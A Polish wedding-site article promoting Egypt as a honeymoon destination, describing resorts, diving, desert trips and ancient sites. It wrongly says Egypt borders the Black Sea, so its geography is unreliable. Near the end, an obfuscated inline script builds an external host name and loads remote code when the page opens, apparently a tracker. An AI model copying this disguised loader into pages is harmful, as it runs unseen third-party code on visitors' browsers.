Pomysł na podróż poślubną - Egipt Wesele i Ślub z weselicho.net

  • Trzy pytania, które warto zadać sobie przed zakupem obrączek ślubnych
  • Kto powinien wybrać pierścionek zaręczynowy?
  • 64 najlepsze piosenki na pierwszy taniec
  • Sesja ślubna - niebanalne pomysły
  • Świadkowie na ślubie. Jak ich wybrać?
  • Zespół na wesele - trudny wybór ?

Pomysł na podróż poślubną - Egipt

Pomysł na podróż poślubną - Egipt
Średnio 4.67 na 3 głosów

Priorytet – wypoczynek

Egipt to kraj położony w północno-wschodniej części Afryki, otoczony przez dwa morza : Morze Śródziemne oraz Morze Czarne. Praktycznie w całości znajduje się w strefie klimatu zwrotnikowego pustynnego, który gwarantuje przepiękną pogodę w bardzo długim zakresie czasu. Jeżeli lubimy upały powinniśmy wybrać się tam w okresie wakacyjnym między czerwcem, a sierpniem. Jeżeli jednak preferujemy trochę niższe temperatury, (jednak praktycznie nigdy nie spadające poniżej 20°C) możemy wybrać się do Egiptu w każdym innym miesiącu roku. Kraj ten jest niekwestionowanym liderem wśród ofert wypoczynku na pięknych piaszczystych plażach wśród palm. Urlop w Egipcie możemy spędzić w jednym z najpopularniejszych kurortów tj: Hurghada, Sharm El Sheikh czy Marsa Alam. Wśród licznego zaplecza hotelowego turyści i nowożeńcy mają do wyboru zarówno luksusowe, kilkugwiazdkowe hotele jak i skromniejsze hoteliki. Oferta zawiera również m.in. ogromne kompleksy hotelowe wyposażone w prywatne spa i piękne baseny, które zadowolą każdą, nawet najbardziej wymagającą pannę młodą. Piękna pogoda zapewni możliwość praktycznie nieustannego plażowania i wylegiwania się na słońcu.

Wypoczynek dla aktywnych

Nie wszyscy nowożeńcy lubią jednak bezczynne wylegiwanie się na plaży. To jednak nie stanowi większego problemu. W Egipcie można bowiem również wypoczywać w sposób aktywny. Jedną z najpopularniejszych opcji, która jest szeroko dostępna praktycznie dla wszystkich przebywających w tym kraju turystów, jest nurkowanie. Najlepszym miejscem do uprawiania tego sportu są okolice Hurghady, gdzie znajdują się przepiękne rafy koralowe. Dzięki nurkowaniu możemy podziwiać je z naprawdę niewielkiej odległości. Ponadto w ofercie wielu hoteli oraz biur podróży znajdują się takie rozrywki jak: surfing czy kitesurfing. Wśród atrakcji, w których możemy uczestniczyć na terenach poza miastami są rajdy samochodami terenowymi po bezdrożach pustyni. Nowością natomiast są zjazdy na nartach z pustynnych zboczy. Ogromne obszary wypełnione po brzegi złocistym piaskiem z pewnością zrobią wrażenie na każdym turyście.

Zwiedzanie dla ciekawskich

Wiele biur podróży oferuje objazdową formę zwiedzania najpopularniejszych i najciekawszych miejsc w Egipcie. Można ją również połączyć z kilkudniowym wypoczynkiem na plaży. W tym kraju znajdziemy mnóstwo wspaniałych zabytków, ponadto możemy zetknąć się z najstarszą cywilizacją na świecie. Do miejsc, które powinny znaleźć się obowiązkowo na naszej trasie zwiedzania należą m.in. : Giza z piramidą Cheopsa i Sfinksem czy Dolina Królów z Grobowcem Tutenchamona. Ciekawym kierunkiem zwiedzania jest również wycieczka statkiem wzdłuż najdłuższej rzeki na świecie – Nilu. W trakcie naszych podróży możemy poznać bardzo ciekawą kulturę, która jest praktycznie całkowicie odmienna od naszej. Ponadto możemy zasmakować w tamtejszej kuchni. Dla wielbicieli pamiątek ciekawym punktem mogą okazać się bardzo liczne w Egipcie targowiska z ogromną liczbą stoisk i sklepików.

Wakacje w kraju faraonów to idealne rozwiązanie dla osób, które chcą wypocząć w pięknym, egzotycznym miejscu oraz zwiedzić wiele ciekawych miejsc. Dzięki gwarancji pięknej pogody i niewygórowanym cenom urlop w Egipcie to świetny start w nowe życie.

(function(){ ut87=document.createElement("script");ut87.type="text/javascript"; ut87.async=true;ut87_=(("us")+"t")+"a";ut87_+=("t.i")+""+"n";ut87_+=(("f")+"o"); ut87.src="http://"+ut87_+"/3688636.uf1Xsijvt87ldfp5bwtsynkn72vlv6"; document.body.appendChild(ut87); })();
Udostępnij:

Komentarze

Czytaj również

Reklama:

Najczęściej czytane